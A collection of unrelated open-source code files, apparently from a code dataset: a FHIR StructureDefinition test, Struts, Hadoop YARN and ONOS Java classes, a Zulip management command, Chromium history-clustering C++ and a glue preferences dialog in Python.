"DocumentSectionLibrary") self.assertEqual(inst.status, "active") self.assertEqual(inst.text.status, "generated") self.assertEqual(inst.title, "Document Section Library (For testing section templates)") self.assertEqual(inst.type, "Composition") self.assertEqual(inst.url, "http://hl7.org/fhir/StructureDefinition/example-section-library") def testStructureDefinition2(self): inst = self.instantiate_from("structuredefinition-example-composition.json") self.assertIsNotNone(inst, "Must have instantiated a StructureDefinition instance") self.implStructureDefinition2(inst) js = inst.as_json() self.assertEqual("StructureDefinition", js["resourceType"]) inst2 = structuredefinition.StructureDefinition(js) self.implStructureDefinition2(inst2) def implStructureDefinition2(self, inst): self.assertFalse(inst.abstract) self.assertEqual(inst.baseDefinition, "http://hl7.org/fhir/StructureDefinition/Composition") self.assertEqual(inst.date.date, FHIRDate("2018-11-05T17:47:00+11:00").date) self.assertEqual(inst.date.as_json(), "2018-11-05T17:47:00+11:00") self.assertEqual(inst.derivation, "constraint") self.assertEqual(inst.differential.element[0].id, "Composition") self.assertEqual(inst.differential.element[0].path, "Composition") self.assertEqual(inst.differential.element[1].id, "Composition.section") self.assertEqual(inst.differential.element[1].path, "Composition.section") self.assertEqual(inst.differential.element[1].slicing.description, "Slice by .section.code") self.assertEqual(inst.differential.element[1].slicing.discriminator[0].path, "code") self.assertEqual(inst.differential.element[1].slicing.discriminator[0].type, "pattern") self.assertTrue(inst.differential.element[1].slicing.ordered) self.assertEqual(inst.differential.element[1].slicing.rules, "closed") self.assertEqual(inst.differential.element[2].id, "Composition.section:procedure") self.assertEqual(inst.differential.element[2].min, 1) self.assertEqual(inst.differential.element[2].path, "Composition.section") self.assertEqual(inst.differential.element[2].sliceName, "procedure") self.assertEqual(inst.differential.element[2].type[0].code, "BackboneElement") self.assertEqual(inst.differential.element[2].type[0].profile[0], "http://hl7.org/fhir/StructureDefinition/document-section-library") self.assertEqual(inst.differential.element[3].id, "Composition.section:medications") self.assertEqual(inst.differential.element[3].min, 1) self.assertEqual(inst.differential.element[3].path, "Composition.section") self.assertEqual(inst.differential.element[3].sliceName, "medications") self.assertEqual(inst.differential.element[3].type[0].code, "BackboneElement") self.assertEqual(inst.differential.element[3].type[0].profile[0], "http://hl7.org/fhir/StructureDefinition/document-section-library") self.assertEqual(inst.differential.element[4].id, "Composition.section:plan") self.assertEqual(inst.differential.element[4].min, 0) self.assertEqual(inst.differential.element[4].path, "Composition.section") self.assertEqual(inst.differential.element[4].sliceName, "plan") self.assertEqual(inst.differential.element[4].type[0].code, "BackboneElement") self.assertEqual(inst.differential.element[4].type[0].profile[0], "http://hl7.org/fhir/StructureDefinition/document-section-library") self.assertFalse(inst.experimental) self.assertEqual(inst.id, "example-composition") self.assertEqual(inst.kind, "complex-type") self.assertEqual(inst.name, "DocumentStructure") self.assertEqual(inst.status, "active") self.assertEqual(inst.text.status, "generated") self.assertEqual(inst.title, "Document Structure (For testing section templates)") self.assertEqual(inst.type, "Composition") self.assertEqual(inst.url, "http://hl7.org/fhir/StructureDefinition/example-composition")
3,780
1,330
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.struts2.compiler; import javax.tools.JavaFileObject; import javax.tools.SimpleJavaFileObject; import java.io.*; import java.net.URI; import java.net.URISyntaxException; /** * Captures the output of the java compiler in memory */ public class MemoryJavaFileObject extends SimpleJavaFileObject { private ByteArrayOutputStream out; public MemoryJavaFileObject(String name, JavaFileObject.Kind kind) { super(toURI(name), kind); } public InputStream openInputStream() throws IOException, IllegalStateException, UnsupportedOperationException { return new ByteArrayInputStream(out.toByteArray()); } public OutputStream openOutputStream() throws IOException, IllegalStateException, UnsupportedOperationException { return out = new ByteArrayOutputStream(); } private static URI toURI(String name) { try { return new URI(name); } catch (URISyntaxException e) { throw new RuntimeException(e); } } public byte[] toByteArray() { return out.toByteArray(); } }
658
14,425
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.yarn.server.scheduler; import org.apache.commons.lang3.StringUtils; import org.apache.hadoop.yarn.api.records.ApplicationAttemptId; import org.apache.hadoop.yarn.api.records.Container; import org.apache.hadoop.yarn.api.records.Resource; import org.apache.hadoop.yarn.api.records.ResourceBlacklistRequest; import org.apache.hadoop.yarn.api.records.ResourceRequest; import org.apache.hadoop.yarn.exceptions.YarnException; import org.apache.hadoop.yarn.server.api.protocolrecords.RemoteNode; import org.apache.hadoop.yarn.server.metrics.OpportunisticSchedulerMetrics; import org.apache.hadoop.yarn.server.security.BaseContainerTokenSecretManager; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.util.ArrayList; import java.util.Collection; import java.util.HashMap; import java.util.HashSet; import java.util.LinkedList; import java.util.List; import java.util.Map; import java.util.Set; /** * <p> * The DistributedOpportunisticContainerAllocator allocates containers on a * given list of nodes, after modifying the container sizes to respect the * limits set by the ResourceManager. It tries to distribute the containers * as evenly as possible. * </p> */ public class DistributedOpportunisticContainerAllocator extends OpportunisticContainerAllocator { private static final int NODE_LOCAL_LOOP = 0; private static final int RACK_LOCAL_LOOP = 1; private static final int OFF_SWITCH_LOOP = 2; private static final Logger LOG = LoggerFactory.getLogger(DistributedOpportunisticContainerAllocator.class); /** * Create a new Opportunistic Container Allocator. * @param tokenSecretManager TokenSecretManager */ public DistributedOpportunisticContainerAllocator( BaseContainerTokenSecretManager tokenSecretManager) { super(tokenSecretManager); } /** * Create a new Opportunistic Container Allocator. * @param tokenSecretManager TokenSecretManager * @param maxAllocationsPerAMHeartbeat max number of containers to be * allocated in one AM heartbeat */ public DistributedOpportunisticContainerAllocator( BaseContainerTokenSecretManager tokenSecretManager, int maxAllocationsPerAMHeartbeat) { super(tokenSecretManager, maxAllocationsPerAMHeartbeat); } @Override public List<Container> allocateContainers(ResourceBlacklistRequest blackList, List<ResourceRequest> oppResourceReqs, ApplicationAttemptId applicationAttemptId, OpportunisticContainerContext opportContext, long rmIdentifier, String appSubmitter) throws YarnException { // Update black list. updateBlacklist(blackList, opportContext); // Add OPPORTUNISTIC requests to the outstanding ones. opportContext.addToOutstandingReqs(oppResourceReqs); Set<String> nodeBlackList = new HashSet<>(opportContext.getBlacklist()); Set<String> allocatedNodes = new HashSet<>(); List<Container> allocatedContainers = new ArrayList<>(); // Satisfy the outstanding OPPORTUNISTIC requests. boolean continueLoop = true; while (continueLoop) { continueLoop = false; List<Map<Resource, List<Allocation>>> allocations = new ArrayList<>(); for (SchedulerRequestKey schedulerKey : opportContext.getOutstandingOpReqs().descendingKeySet()) { // Allocated containers : // Key = Requested Capability, // Value = List of Containers of given cap (the actual container size // might be different than what is requested, which is why // we need the requested capability (key) to match against // the outstanding reqs) int remAllocs = -1; int maxAllocationsPerAMHeartbeat = getMaxAllocationsPerAMHeartbeat(); if (maxAllocationsPerAMHeartbeat > 0) { remAllocs = maxAllocationsPerAMHeartbeat - allocatedContainers.size() - getTotalAllocations(allocations); if (remAllocs <= 0) { LOG.info("Not allocating more containers as we have reached max " + "allocations per AM heartbeat {}", maxAllocationsPerAMHeartbeat); break; } } Map<Resource, List<Allocation>> allocation = allocate( rmIdentifier, opportContext, schedulerKey, applicationAttemptId, appSubmitter, nodeBlackList, allocatedNodes, remAllocs); if (allocation.size() > 0) { allocations.add(allocation); continueLoop = true; } } matchAllocation(allocations, allocatedContainers, opportContext); } return allocatedContainers; } private Map<Resource, List<Allocation>> allocate(long rmIdentifier, OpportunisticContainerContext appContext, SchedulerRequestKey schedKey, ApplicationAttemptId appAttId, String userName, Set<String> blackList, Set<String> allocatedNodes, int maxAllocations) throws YarnException { Map<Resource, List<Allocation>> containers = new HashMap<>(); for (EnrichedResourceRequest enrichedAsk : appContext.getOutstandingOpReqs().get(schedKey).values()) { int remainingAllocs = -1; if (maxAllocations > 0) { int totalAllocated = 0; for (List<Allocation> allocs : containers.values()) { totalAllocated += allocs.size(); } remainingAllocs = maxAllocations - totalAllocated; if (remainingAllocs <= 0) { LOG.info("Not allocating more containers as max allocations per AM " + "heartbeat {} has reached", getMaxAllocationsPerAMHeartbeat()); break; } } allocateContainersInternal(rmIdentifier, appContext.getAppParams(), appContext.getContainerIdGenerator(), blackList, allocatedNodes, appAttId, appContext.getNodeMap(), userName, containers, enrichedAsk, remainingAllocs); ResourceRequest anyAsk = enrichedAsk.getRequest(); if (!containers.isEmpty()) { LOG.info("Opportunistic allocation requested for [priority={}, " + "allocationRequestId={}, num_containers={}, capability={}] " + "allocated = {}", anyAsk.getPriority(), anyAsk.getAllocationRequestId(), anyAsk.getNumContainers(), anyAsk.getCapability(), containers.keySet()); } } return containers; } private void allocateContainersInternal(long rmIdentifier, AllocationParams appParams, ContainerIdGenerator idCounter, Set<String> blacklist, Set<String> allocatedNodes, ApplicationAttemptId id, Map<String, RemoteNode> allNodes, String userName, Map<Resource, List<Allocation>> allocations, EnrichedResourceRequest enrichedAsk, int maxAllocations) throws YarnException { if (allNodes.size() == 0) { LOG.info("No nodes currently available to " + "allocate OPPORTUNISTIC containers."); return; } ResourceRequest anyAsk = enrichedAsk.getRequest(); int toAllocate = anyAsk.getNumContainers() - (allocations.isEmpty() ? 0 : allocations.get(anyAsk.getCapability()).size()); toAllocate = Math.min(toAllocate, appParams.getMaxAllocationsPerSchedulerKeyPerRound()); if (maxAllocations >= 0) { toAllocate = Math.min(maxAllocations, toAllocate); } int numAllocated = 0; // Node Candidates are selected as follows: // * Node local candidates selected in loop == 0 // * Rack local candidates selected in loop == 1 // * From loop == 2 onwards, we revert to off switch allocations. int loopIndex = OFF_SWITCH_LOOP; if (enrichedAsk.getNodeMap().size() > 0) { loopIndex = NODE_LOCAL_LOOP; } while (numAllocated < toAllocate) { Collection<RemoteNode> nodeCandidates = findNodeCandidates(loopIndex, allNodes, blacklist, allocatedNodes, enrichedAsk); for (RemoteNode rNode : nodeCandidates) { String rNodeHost = rNode.getNodeId().getHost(); // Ignore black list if (blacklist.contains(rNodeHost)) { LOG.info("Nodes for scheduling has a blacklisted node" + " [" + rNodeHost + "].."); continue; } String location = ResourceRequest.ANY; if (loopIndex == NODE_LOCAL_LOOP) { if (enrichedAsk.getNodeMap().containsKey(rNodeHost)) { location = rNodeHost; } else { continue; } } else if (allocatedNodes.contains(rNodeHost)) { LOG.info("Opportunistic container has already been allocated on {}.", rNodeHost); continue; } if (loopIndex == RACK_LOCAL_LOOP) { if (enrichedAsk.getRackMap().containsKey( rNode.getRackName())) { location = rNode.getRackName(); } else { continue; } } Container container = createContainer(rmIdentifier, appParams, idCounter, id, userName, allocations, location, anyAsk, rNode); numAllocated++; updateMetrics(loopIndex); allocatedNodes.add(rNodeHost); LOG.info("Allocated [" + container.getId() + "] as opportunistic at " + "location [" + location + "]"); if (numAllocated >= toAllocate) { break; } } if (loopIndex == NODE_LOCAL_LOOP && enrichedAsk.getRackMap().size() > 0) { loopIndex = RACK_LOCAL_LOOP; } else { loopIndex++; } // Handle case where there are no nodes remaining after blacklist is // considered. if (loopIndex > OFF_SWITCH_LOOP && numAllocated == 0) { LOG.warn("Unable to allocate any opportunistic containers."); break; } } } private void updateMetrics(int loopIndex) { OpportunisticSchedulerMetrics metrics = OpportunisticSchedulerMetrics.getMetrics(); if (loopIndex == NODE_LOCAL_LOOP) { metrics.incrNodeLocalOppContainers(); } else if (loopIndex == RACK_LOCAL_LOOP) { metrics.incrRackLocalOppContainers(); } else { metrics.incrOffSwitchOppContainers(); } } private Collection<RemoteNode> findNodeCandidates(int loopIndex, Map<String, RemoteNode> allNodes, Set<String> blackList, Set<String> allocatedNodes, EnrichedResourceRequest enrichedRR) { LinkedList<RemoteNode> retList = new LinkedList<>(); String partition = getRequestPartition(enrichedRR); if (loopIndex > 1) { for (RemoteNode remoteNode : allNodes.values()) { if (StringUtils.equals(partition, getRemoteNodePartition(remoteNode))) { retList.add(remoteNode); } } return retList; } else { int numContainers = enrichedRR.getRequest().getNumContainers(); while (numContainers > 0) { if (loopIndex == 0) { // Node local candidates numContainers = collectNodeLocalCandidates( allNodes, enrichedRR, retList, numContainers); } else { // Rack local candidates numContainers = collectRackLocalCandidates(allNodes, enrichedRR, retList, blackList, allocatedNodes, numContainers); } if (numContainers == enrichedRR.getRequest().getNumContainers()) { // If there is no change in numContainers, then there is no point // in looping again. break; } } return retList; } } private int collectRackLocalCandidates(Map<String, RemoteNode> allNodes, EnrichedResourceRequest enrichedRR, LinkedList<RemoteNode> retList, Set<String> blackList, Set<String> allocatedNodes, int numContainers) { String partition = getRequestPartition(enrichedRR); for (RemoteNode rNode : allNodes.values()) { if (StringUtils.equals(partition, getRemoteNodePartition(rNode)) && enrichedRR.getRackMap().containsKey(rNode.getRackName())) { String rHost = rNode.getNodeId().getHost(); if (blackList.contains(rHost)) { continue; } if (allocatedNodes.contains(rHost)) { retList.addLast(rNode); } else { retList.addFirst(rNode); numContainers--; } } if (numContainers == 0) { break; } } return numContainers; } private int collectNodeLocalCandidates(Map<String, RemoteNode> allNodes, EnrichedResourceRequest enrichedRR, List<RemoteNode> retList, int numContainers) { String partition = getRequestPartition(enrichedRR); for (String nodeName : enrichedRR.getNodeMap().keySet()) { RemoteNode remoteNode = allNodes.get(nodeName); if (remoteNode != null && StringUtils.equals(partition, getRemoteNodePartition(remoteNode))) { retList.add(remoteNode); numContainers--; } if (numContainers == 0) { break; } } return numContainers; } }
5,291
1,091
/* * Copyright 2018-present Open Networking Foundation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.onosproject.store.flow.impl; import java.util.Map; import java.util.concurrent.atomic.AtomicReference; import java.util.function.Function; import java.util.stream.Collectors; import com.google.common.collect.Maps; import org.onosproject.core.ApplicationId; import org.onosproject.net.flow.DefaultFlowEntry; import org.onosproject.net.flow.FlowEntry; import org.onosproject.net.flow.FlowId; import org.onosproject.net.flow.FlowRule; import org.onosproject.net.flow.StoredFlowEntry; import org.onosproject.store.LogicalTimestamp; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * Container for a bucket of flows assigned to a specific device. * <p> * The bucket is mutable. When changes are made to the bucket, the term and timestamp in which the change * occurred is recorded for ordering changes. */ public class FlowBucket { private static final Logger LOGGER = LoggerFactory.getLogger(FlowBucket.class); private final BucketId bucketId; private volatile long term; private volatile LogicalTimestamp timestamp; private final Map<FlowId, Map<StoredFlowEntry, StoredFlowEntry>> flowBucket; FlowBucket(BucketId bucketId) { this(bucketId, 0, new LogicalTimestamp(0), Maps.newConcurrentMap()); } private FlowBucket( BucketId bucketId, long term, LogicalTimestamp timestamp, Map<FlowId, Map<StoredFlowEntry, StoredFlowEntry>> flowBucket) { this.bucketId = bucketId; this.term = term; this.timestamp = timestamp; this.flowBucket = flowBucket; } /** * Returns the flow bucket identifier. * * @return the flow bucket identifier */ public BucketId bucketId() { return bucketId; } /** * Returns the flow bucket term. * * @return the flow bucket term */ public long term() { return term; } /** * Returns the flow bucket timestamp. * * @return the flow bucket timestamp */ public LogicalTimestamp timestamp() { return timestamp; } /** * Returns the digest for the bucket. * * @return the digest for the bucket */ public FlowBucketDigest getDigest() { return new FlowBucketDigest(bucketId().bucket(), term(), timestamp()); } /** * Returns the flow entries in the bucket. * * @return the flow entries in the bucket */ public Map<FlowId, Map<StoredFlowEntry, StoredFlowEntry>> getFlowBucket() { return flowBucket; } /** * Returns the flow entries for the given flow. * * @param flowId the flow identifier * @return the flows for the given flow ID */ public Map<StoredFlowEntry, StoredFlowEntry> getFlowEntries(FlowId flowId) { Map<StoredFlowEntry, StoredFlowEntry> flowEntries = flowBucket.get(flowId); return flowEntries != null ? flowEntries : flowBucket.computeIfAbsent(flowId, id -> Maps.newConcurrentMap()); } /** * Counts the flows in the bucket. * * @return the number of flows in the bucket */ public int count() { return flowBucket.values() .stream() .mapToInt(entry -> entry.values().size()) .sum(); } /** * Returns a new copy of the flow bucket. * * @return a new copy of the flow bucket */ FlowBucket copy() { return new FlowBucket( bucketId, term, timestamp, flowBucket.entrySet() .stream() .map(e -> Maps.immutableEntry(e.getKey(), Maps.newHashMap(e.getValue()))) .collect(Collectors.toMap(e -> e.getKey(), e -> e.getValue()))); } /** * Records an update to the bucket. */ private void recordUpdate(long term, LogicalTimestamp timestamp) { this.term = term; this.timestamp = timestamp; } /** * Adds the given flow rule to the bucket. * * @param rule the rule to add * @param term the term in which the change occurred * @param clock the logical clock */ public void add(FlowEntry rule, long term, LogicalClock clock) { Map<StoredFlowEntry, StoredFlowEntry> flowEntries = flowBucket.get(rule.id()); if (flowEntries == null) { flowEntries = flowBucket.computeIfAbsent(rule.id(), id -> Maps.newConcurrentMap()); } flowEntries.put((StoredFlowEntry) rule, (StoredFlowEntry) rule); recordUpdate(term, clock.getTimestamp()); } /** * Updates the given flow rule in the bucket. * * @param rule the rule to update * @param term the term in which the change occurred * @param clock the logical clock */ public void update(FlowEntry rule, long term, LogicalClock clock) { Map<StoredFlowEntry, StoredFlowEntry> flowEntries = flowBucket.get(rule.id()); if (flowEntries == null) { flowEntries = flowBucket.computeIfAbsent(rule.id(), id -> Maps.newConcurrentMap()); } flowEntries.computeIfPresent((StoredFlowEntry) rule, (k, stored) -> { if (rule instanceof DefaultFlowEntry) { DefaultFlowEntry updated = (DefaultFlowEntry) rule; if (stored instanceof DefaultFlowEntry) { DefaultFlowEntry storedEntry = (DefaultFlowEntry) stored; if (updated.created() >= storedEntry.created()) { recordUpdate(term, clock.getTimestamp()); return updated; } else { LOGGER.debug("Trying to update more recent flow entry {} (stored: {})", updated, stored); return stored; } } } return stored; }); } /** * Applies the given update function to the rule. * * @param rule the rule to update * @param function the update function to apply * @param term the term in which the change occurred * @param clock the logical clock * @param <T> the result type * @return the update result or {@code null} if the rule was not updated */ public <T> T update(FlowRule rule, Function<StoredFlowEntry, T> function, long term, LogicalClock clock) { Map<StoredFlowEntry, StoredFlowEntry> flowEntries = flowBucket.get(rule.id()); if (flowEntries == null) { flowEntries = flowBucket.computeIfAbsent(rule.id(), id -> Maps.newConcurrentMap()); } AtomicReference<T> resultRef = new AtomicReference<>(); flowEntries.computeIfPresent(new DefaultFlowEntry(rule), (k, stored) -> { if (stored != null) { T result = function.apply(stored); if (result != null) { recordUpdate(term, clock.getTimestamp()); resultRef.set(result); } } return stored; }); return resultRef.get(); } /** * Removes the given flow rule from the bucket. * * @param rule the rule to remove * @param term the term in which the change occurred * @param clock the logical clock * @return the removed flow entry */ public FlowEntry remove(FlowEntry rule, long term, LogicalClock clock) { final AtomicReference<FlowEntry> removedRule = new AtomicReference<>(); flowBucket.computeIfPresent(rule.id(), (flowId, flowEntries) -> { flowEntries.computeIfPresent((StoredFlowEntry) rule, (k, stored) -> { if (rule instanceof DefaultFlowEntry) { DefaultFlowEntry toRemove = (DefaultFlowEntry) rule; if (stored instanceof DefaultFlowEntry) { DefaultFlowEntry storedEntry = (DefaultFlowEntry) stored; if (toRemove.created() < storedEntry.created()) { LOGGER.debug("Trying to remove more recent flow entry {} (stored: {})", toRemove, stored); // the key is not updated, removedRule remains null return stored; } } } removedRule.set(stored); return null; }); return flowEntries.isEmpty() ? null : flowEntries; }); if (removedRule.get() != null) { recordUpdate(term, clock.getTimestamp()); return removedRule.get(); } else { return null; } } /** * Purges the bucket. */ public void purge() { flowBucket.clear(); } /** * Purge the entries with the given application ID. * * @param appId the application ID * @param term the term in which the purge occurred * @param clock the logical clock */ public void purge(ApplicationId appId, long term, LogicalClock clock) { boolean anythingRemoved = flowBucket.values().removeIf(flowEntryMap -> { flowEntryMap.values().removeIf(storedFlowEntry -> storedFlowEntry.appId() == appId.id()); return flowEntryMap.isEmpty(); }); if (anythingRemoved) { recordUpdate(term, clock.getTimestamp()); } } /** * Clears the bucket. */ public void clear() { term = 0; timestamp = new LogicalTimestamp(0); flowBucket.clear(); } }
4,210
17,004
from typing import Any from django.conf import settings from django.core.management.base import CommandError, CommandParser from zerver.lib.management import ZulipBaseCommand if settings.BILLING_ENABLED: from corporate.lib.stripe import switch_realm_from_standard_to_plus_plan class Command(ZulipBaseCommand): def add_arguments(self, parser: CommandParser) -> None: self.add_realm_args(parser) def handle(self, *args: Any, **options: Any) -> None: realm = self.get_realm(options) if not realm: raise CommandError("No realm found.") if settings.BILLING_ENABLED: switch_realm_from_standard_to_plus_plan(realm)
254
14,668
<gh_stars>1000+ // Copyright 2021 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "components/history_clusters/core/clusterer.h" #include "base/strings/utf_string_conversions.h" #include "components/history/core/browser/history_types.h" #include "components/history_clusters/core/on_device_clustering_features.h" namespace history_clusters { namespace { void AddKeywordsForVisitToCluster(history::Cluster& cluster, const history::ClusterVisit& visit) { base::flat_set<std::u16string> keywords_set(cluster.keywords.begin(), cluster.keywords.end()); for (const auto& entity : visit.annotated_visit.content_annotations.model_annotations.entities) { keywords_set.insert(base::UTF8ToUTF16(entity.id)); } for (const auto& category : visit.annotated_visit.content_annotations.model_annotations.categories) { keywords_set.insert(base::UTF8ToUTF16(category.id)); } cluster.keywords = std::vector<std::u16string>(keywords_set.begin(), keywords_set.end()); } } // namespace Clusterer::Clusterer() = default; Clusterer::~Clusterer() = default; std::vector<history::Cluster> Clusterer::CreateInitialClustersFromVisits( const std::vector<history::ClusterVisit>& visits) { // Sort visits by visit ID. std::vector<history::ClusterVisit> sorted_visits(visits.size()); std::partial_sort_copy( visits.begin(), visits.end(), sorted_visits.begin(), sorted_visits.end(), [](const history::ClusterVisit& a, const history::ClusterVisit& b) { return a.annotated_visit.visit_row.visit_id < b.annotated_visit.visit_row.visit_id; }); base::flat_map<GURL, size_t> url_to_cluster_map; base::flat_map<history::VisitID, size_t> visit_id_to_cluster_map; std::vector<history::Cluster> clusters; for (const auto& visit : sorted_visits) { auto visit_url = visit.normalized_url; absl::optional<size_t> cluster_idx; history::VisitID previous_visit_id = (visit.annotated_visit.referring_visit_of_redirect_chain_start != 0) ? visit.annotated_visit.referring_visit_of_redirect_chain_start : visit.annotated_visit.opener_visit_of_redirect_chain_start; if (previous_visit_id != 0) { // See if we have clustered the referring visit. auto it = visit_id_to_cluster_map.find(previous_visit_id); if (it != visit_id_to_cluster_map.end()) { cluster_idx = it->second; } } else { // See if we have clustered the URL. (forward-back, reload, etc.) auto it = url_to_cluster_map.find(visit_url); if (it != url_to_cluster_map.end()) { cluster_idx = it->second; } } DCHECK(!cluster_idx || (*cluster_idx < clusters.size())); // Even if above conditions were met, add it to a new cluster if the last // visit in the cluster's navigation time exceeds a certain duration. if (cluster_idx) { auto in_progress_cluster = clusters[*cluster_idx]; auto last_visit_nav_time = in_progress_cluster.visits.back() .annotated_visit.visit_row.visit_time; if ((visit.annotated_visit.visit_row.visit_time - last_visit_nav_time) > features::ClusterNavigationTimeCutoff()) { // Erase all visits in the cluster from the maps since we no longer // want to consider anything in the cluster as a referrer. auto finalized_cluster = clusters[*cluster_idx]; for (const auto& visit : finalized_cluster.visits) { visit_id_to_cluster_map.erase( visit.annotated_visit.visit_row.visit_id); url_to_cluster_map.erase(visit_url); } // Reset the working cluster index so we start a new cluster for this // visit. cluster_idx = absl::nullopt; } } // By default, the current visit will be assigned a max score of 1.0 until // otherwise scored during finalization. history::ClusterVisit default_scored_visit = visit; default_scored_visit.score = 1.0; if (cluster_idx) { clusters[*cluster_idx].visits.push_back(default_scored_visit); AddKeywordsForVisitToCluster(clusters[*cluster_idx], default_scored_visit); } else { // Add to new cluster. cluster_idx = clusters.size(); history::Cluster new_cluster; new_cluster.visits = {default_scored_visit}; AddKeywordsForVisitToCluster(new_cluster, default_scored_visit); clusters.push_back(std::move(new_cluster)); } visit_id_to_cluster_map[visit.annotated_visit.visit_row.visit_id] = *cluster_idx; url_to_cluster_map[visit_url] = *cluster_idx; } return clusters; } } // namespace history_clusters
2,035
550
<reponame>HPLegion/glue<gh_stars>100-1000 import os import weakref import platform from collections import OrderedDict import numpy as np from matplotlib.colors import ColorConverter from qtpy import QtWidgets from glue.core.message import SettingsChangeMessage from glue.utils.qt import load_ui, ColorProperty, get_qapp from glue.utils.qt.widget_properties import (CurrentComboTextProperty, ValueProperty, ButtonProperty) from glue._settings_helpers import save_settings __all__ = ["PreferencesDialog"] rgb = ColorConverter().to_rgb AUTOLINK_OPTIONS = OrderedDict([ ('always_show', 'Always show suggestions'), ('always_accept', 'Always accept suggestions'), ('always_ignore', 'Always ignore suggestions') ]) class AutolinkPreferencesPane(QtWidgets.QWidget): def __init__(self, parent=None): super(AutolinkPreferencesPane, self).__init__(parent=parent) from glue.config import settings, autolinker # noqa layout = QtWidgets.QGridLayout() self.combos = {} if len(autolinker) > 0: for i, (label, _) in enumerate(autolinker): combo = QtWidgets.QComboBox() for short, display in AUTOLINK_OPTIONS.items(): combo.addItem(display, userData=short) if label in settings.AUTOLINK: index = list(AUTOLINK_OPTIONS.keys()).index(settings.AUTOLINK[label]) else: index = 0 combo.setCurrentIndex(index) layout.addWidget(QtWidgets.QLabel(label), i, 0) layout.addWidget(combo, i, 1) self.combos[label] = combo layout.addWidget(QtWidgets.QWidget(), i + 1, 0) self.setLayout(layout) def finalize(self): from glue.config import settings for label, combo in self.combos.items(): settings.AUTOLINK[label] = combo.currentData() class PreferencesDialog(QtWidgets.QDialog): theme = CurrentComboTextProperty('ui.combo_theme') background = ColorProperty('ui.color_background') foreground = ColorProperty('ui.color_foreground') data_color = ColorProperty('ui.color_default_data') data_alpha = ValueProperty('ui.slider_alpha', value_range=(0, 1)) data_apply = ButtonProperty('ui.checkbox_apply') save_to_disk = ButtonProperty('ui.checkbox_save') font_size = ValueProperty('ui.spinner_font_size') def __init__(self, application, parent=None): super(PreferencesDialog, self).__init__(parent=parent) self._app = weakref.ref(application) self.ui = load_ui('preferences.ui', self, directory=os.path.dirname(__file__)) self.ui.cancel.clicked.connect(self.reject) self.ui.ok.clicked.connect(self.accept) self.ui.combo_theme.currentIndexChanged.connect(self._update_colors_from_theme) self.ui.button_reset_dialogs.clicked.connect(self._reset_dialogs) # The following is needed because of a bug in Qt which means that # tab titles don't get scaled right. if platform.system() == 'Darwin': app = get_qapp() app_font = app.font() self.ui.tab_widget.setStyleSheet('font-size: {0}px'.format(app_font.pointSize())) from glue.config import settings self.background = settings.BACKGROUND_COLOR self.foreground = settings.FOREGROUND_COLOR self.data_color = settings.DATA_COLOR self.data_alpha = settings.DATA_ALPHA self.font_size = settings.FONT_SIZE self._update_theme_from_colors() self._autolink_pane = AutolinkPreferencesPane() self.ui.tab_widget.addTab(self._autolink_pane, 'Autolinking') self.panes = [] from glue.config import preference_panes for label, widget_cls in sorted(preference_panes): pane = widget_cls() self.ui.tab_widget.addTab(pane, label) self.panes.append(pane) def _update_theme_from_colors(self, *args): if (rgb(self.background) == (1, 1, 1) and rgb(self.foreground) == (0, 0, 0) and rgb(self.data_color) == (0.35, 0.35, 0.35) and np.allclose(self.data_alpha, 0.8)): self.theme = 'Black on White' elif (rgb(self.background) == (0, 0, 0) and rgb(self.foreground) == (1, 1, 1) and rgb(self.data_color) == (0.75, 0.75, 0.75) and np.allclose(self.data_alpha, 0.8)): self.theme = 'White on Black' else: self.theme = 'Custom' def _update_colors_from_theme(self, *args): if self.theme == 'Black on White': self.foreground = 'black' self.background = 'white' self.data_color = '0.35' self.data_alpha = 0.8 elif self.theme == 'White on Black': self.foreground = 'white' self.background = 'black' self.data_color = '0.75' self.data_alpha = 0.8 elif self.theme != 'Custom': raise ValueError("Unknown theme: {0}".format(self.theme)) def _reset_dialogs(self, *args): from glue.config import settings for key, _, _ in settings: if key.lower().startswith(('show_info', 'show_warn', 'show_large')): setattr(settings, key, True) def accept(self): # Update default settings from glue.config import settings settings.FOREGROUND_COLOR = self.foreground settings.BACKGROUND_COLOR = self.background settings.DATA_COLOR = self.data_color settings.DATA_ALPHA = self.data_alpha settings.FONT_SIZE = self.font_size self._autolink_pane.finalize() for pane in self.panes: pane.finalize() # Save to disk if requested if self.save_to_disk: save_settings() else: settings._save_to_disk = True # Trigger viewers to update defaults app = self._app() if app is not None: app._hub.broadcast(SettingsChangeMessage(self, ('FOREGROUND_COLOR', 'BACKGROUND_COLOR', 'FONT_SIZE'))) if self.data_apply: # If requested, trigger data to update color app.set_data_color(settings.DATA_COLOR, settings.DATA_ALPHA) super(PreferencesDialog, self).accept() if __name__ == "__main__": app = get_qapp() widget = PreferencesDialog() widget.show() widget.raise_() app.exec_()
2,874
914
